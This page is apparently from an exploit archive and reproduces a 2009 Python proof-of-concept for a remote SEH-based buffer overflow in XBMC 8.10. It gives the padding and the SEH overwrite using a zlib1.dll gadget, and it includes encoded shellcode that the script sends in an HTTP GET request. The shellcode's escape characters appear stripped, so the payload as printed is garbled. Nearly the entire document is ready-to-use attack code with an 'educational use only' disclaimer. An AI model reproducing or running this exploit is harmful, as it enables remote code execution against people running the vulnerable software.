Home / os / win10

xbmc810-overflow.txt

Posted on 07 April 2009

#!/usr/bin/env python

'''
Xbmc get request remote buffer overflow 8.10 *seh*(Universal address)!!

Tested:Win xp sp2 eng Win vista sp1
Vendor url:http://xbmc.org/
Release date:April the 4th 2009

versions affected: windows all versions.

I had tried awhile to get a nice pop ebx pop ret address and just
could not find a suitable one especially that was any good.and it
had to be shipped with the application and not have /safe seh.

To start with i looked at the zlib.dll to see of there were any
nice pop pop ret address i noticed there was one in particular that
stood out and decided to try it.

There is no need for me to release any more exploits for this application
as i have covered all the areas which i wanted to and want to
move on from this.

If your interested to see how this worked attach a debugger and add some
hit tracing :).It is possible to use this with all the buffer overflows
i released.

Credits to n00b for finding the buffer overflow and writing
exploit.

----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
'''


import sys, socket
import struct

port = 80
host = sys.argv[1]

#1635
Junk_buffer1 = 'A'*998
Pointer_To_Next_SEH = struct.pack('<L',0x909006eb)

###
###/SafeSEH Module Scanner, item 55
# SEH mode=/SafeSEH OFF
# Base=0x62e80000
# Limit=0x62e97000
# Module Name=C:Program FilesXBMCzlib1.dll

###
###This was found in the module zlib1 and is universal.
#62E83BAC   5B               POP EBX
#62E83BAD   5D               POP EBP
#62E83BAE  ^E9 CDD9FFFF      JMP zlib1.compressBound
SE_Handler = struct.pack('<L',0x62E83BAC)


Junk_buffer3 = 'D'*635
Shell_code=(#
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"
"x42x50x42x50x42x30x4bx58x45x54x4ex33x4bx38x4ex57"
"x45x30x4ax37x41x30x4fx4ex4bx58x4fx44x4ax41x4bx38"
"x4fx35x42x42x41x30x4bx4ex49x34x4bx58x46x33x4bx58"
"x41x30x50x4ex41x33x42x4cx49x39x4ex4ax46x58x42x4c"
"x46x37x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x32x46x30x45x47x45x4ex4bx48"
"x4fx35x46x32x41x50x4bx4ex48x36x4bx58x4ex50x4bx54"
"x4bx58x4fx35x4ex31x41x50x4bx4ex4bx38x4ex41x4bx38"
"x41x30x4bx4ex49x38x4ex45x46x52x46x50x43x4cx41x53"
"x42x4cx46x46x4bx48x42x44x42x43x45x38x42x4cx4ax37"
"x4ex50x4bx48x42x44x4ex50x4bx48x42x57x4ex51x4dx4a"
"x4bx48x4ax46x4ax30x4bx4ex49x30x4bx58x42x58x42x4b"
"x42x30x42x50x42x30x4bx48x4ax46x4ex43x4fx55x41x43"
"x48x4fx42x56x48x55x49x58x4ax4fx43x38x42x4cx4bx57"
"x42x55x4ax46x4fx4ex50x4cx42x4ex42x46x4ax36x4ax49"
"x50x4fx4cx48x50x30x47x35x4fx4fx47x4ex43x46x41x56"
"x4ex46x43x56x50x42x45x56x4ax37x45x36x42x30x5a"
)

# create a socket object called 'c'
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# connect to the socket
c.connect((host, port))

Request = (Junk_buffer1 + Pointer_To_Next_SEH + SE_Handler + Shell_code + Junk_buffer3)

# create a file-like object to read
fileobj = c.makefile('r', 0)

# Ask the server for the file
fileobj.write("GET /"+Request+" HTTP/1.1

")

 

TOP

Malware :

Exploits :